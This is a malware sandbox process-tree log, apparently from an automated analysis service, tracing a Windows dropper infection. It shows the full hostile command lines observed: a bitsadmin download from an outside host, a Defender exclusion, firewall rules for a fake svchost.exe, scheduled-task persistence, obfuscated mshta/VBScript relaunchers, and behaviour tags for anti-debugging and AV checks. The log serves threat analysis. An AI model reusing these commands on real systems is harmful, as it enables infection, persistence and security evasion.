C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:813⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3312 /prefetch:213⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1272 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1108 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6456 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4396 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5816 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6860 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x12c,0x130,0x134,0xfc,0x138,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Users\Admin\AppData\Local\Temp\61-d9166-54d-8d1b0-2cb03a4e2ea98\Lylalyfomo.exe"C:\Users\Admin\AppData\Local\Temp\61-d9166-54d-8d1b0-2cb03a4e2ea98\Lylalyfomo.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exeC:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SID=778 CID=778 SILENT=1 /quiet13⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634304480 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exe /eufive & exit12⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exeC:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exeC:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exe /mixfive13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exeC:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exe /qn CAMPAIGN=65413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11a9d578c6.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11a9d578c6.exeMon11a9d578c6.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11c267c861c0984e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exeMon11c267c861c0984e.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpT: cLoSE ( crEAtEOBJeCT("wscRiPT.shELl" ).Run ( "Cmd /R typE ""C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe"" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF """" == """" for %i in (""C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe"" ) do taskkill /IM ""%~nXi"" /f" , 0 ,tRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R typE "C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 &iF "" == "" for %i in ("C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe") do taskkill /IM "%~nXi" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE..\f44LQm.eXE /PsV~zGbxsNCn0ht28⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpT: cLoSE ( crEAtEOBJeCT("wscRiPT.shELl" ).Run ( "Cmd /R typE ""C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE"" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF ""/PsV~zGbxsNCn0ht2 "" == """" for %i in (""C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE"" ) do taskkill /IM ""%~nXi"" /f" , 0 ,tRUE ) )9⤵
-
